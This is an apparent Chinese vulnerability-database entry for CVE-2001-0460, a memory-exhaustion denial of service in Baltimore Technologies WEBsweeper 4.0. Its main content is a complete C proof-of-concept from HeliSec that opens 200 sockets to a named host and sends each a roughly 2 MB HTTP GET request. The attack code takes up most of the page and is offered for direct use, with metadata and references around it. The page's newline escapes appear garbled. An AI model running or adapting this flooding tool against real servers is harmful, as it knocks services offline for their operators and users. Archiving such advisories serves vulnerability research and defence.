Websweeper漏洞
漏洞ID | 1106179 | 漏洞类型 | 未知 |
发布时间 | 2001-01-22 | 更新时间 | 2001-06-27 |
CVE编号 | CVE-2001-0460 |
CNNVD-ID | CNNVD-200106-158 |
漏洞平台 | Windows | CVSS评分 | 5.0 |
|漏洞来源
|漏洞详情
Websweeper4.0版本不能限制某些HTTP头文件的长度。远程攻击者借助极其大的HTTPReferrer:header导致服务拒绝(内存消耗)。
|漏洞EXP
source: http://www.securityfocus.com/bid/2465/info
Baltimore Technology WEBsweeper is subject to a denial of service condition. Submitting an unusually long HTTP request through WEBsweeper will cause the consumption of all available memory on the server where WEBsweeper resides.
/*
----[ honoriak from [HeliSec] 22.3.2001
[ Proof of concept Websweeper Infinite HTTP Request DoS ]
[ Advisory Defcom Labs Advisory def-2001-10 ]
Thanks to doing and all helisec members: merphe, jet-li, kiss,
lyw0d, bonjy.
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <stdlib.h>
#include <time.h>
#include <sys/time.h>
#include <fcntl.h>
#define PORT 80
#define LEN 2000000
#define CON 200
int i, v, n, sel, envi;
int cons[CON];
char ah[LEN];
char ahh[LEN + 7];
char *host;
fd_set env;
struct sockaddr_in victim;
void usage(char *prog) {
printf("[ Websweeper Infinite HTTP Request DoS by [email protected] ");
printf("from Helisec ]n");
printf("-- Advisory: Defcom Labs Advisory def-2001-10 --nn");
printf("Usage: %s hostname number_of_getsn", prog);
exit(0);
}
unsigned long resolver(char *h) {
struct in_addr h2;
struct hostent *hvic;
if (!(hvic = gethostbyname(h))) return(0);
memcpy((char *)&h2.s_addr, hvic->h_addr, hvic->h_length);
return(h2.s_addr);
}
int main(int argc, char *argv[])
{
if (argc < 2)
{
usage(argv[0]);
}
bzero(&victim, sizeof(victim));
victim.sin_family = AF_INET;
victim.sin_port = htons(PORT);
if ( (inet_pton(AF_INET, argv[1], &victim.sin_addr)) <= 0)
{
victim.sin_addr.s_addr = resolver(argv[1]);
}
if (!victim.sin_addr.s_addr) {
printf("Error resolving hostn");
exit(-1);
}
for (i=0; i<=(LEN-1); i++) ah[i] = 'a';
ah[LEN-1] = ' ';
printf("Sending Infinite HTTP Request...n");
sprintf(ahh, "GET /%sn", ah);
for (sel=0; sel < CON; sel++)
{
if ((cons[sel] = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
printf("Error opening socketn");
exit(-1);
}
if ( (n=connect(cons[sel], (struct sockaddr *)&victim, sizeof(victim))) < 0) {
printf("Error connectingn");
exit(-1);
}
}
for (sel=0; sel < CON; sel++) {
FD_SET(cons[sel], &env);
envi=select(cons[sel] + 1, NULL, &env, NULL, NULL);
if ( FD_ISSET(cons[sel], &env) ) {
if ( (send(cons[sel], ahh, strlen(ahh), 0)) < 1) {
printf("Error sendingn");
exit(-1);
}
}
}
exit(-1);
}
/* [HeliSec] <=> [Helios Security and Administration] */
|受影响的产品
Baltimore Technologies Websweeper 4.0
|参考资料
来源:BUGTRAQ
名称:20010308def-2001-10:WebsweeperInfiniteHTTPRequestDoS
链接:http://www.securityfocus.com/archive/1/167406
来源:XF
名称:websweeper-http-dos
链接:http://xforce.iss.net/static/6214.php
相关推荐: rwhod Remote Denial of Service Vulnerability
rwhod Remote Denial of Service Vulnerability 漏洞ID 1103416 漏洞类型 Input Validation Error 发布时间 2001-03-12 更新时间 2001-03-12 CVE编号 N/A CN…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666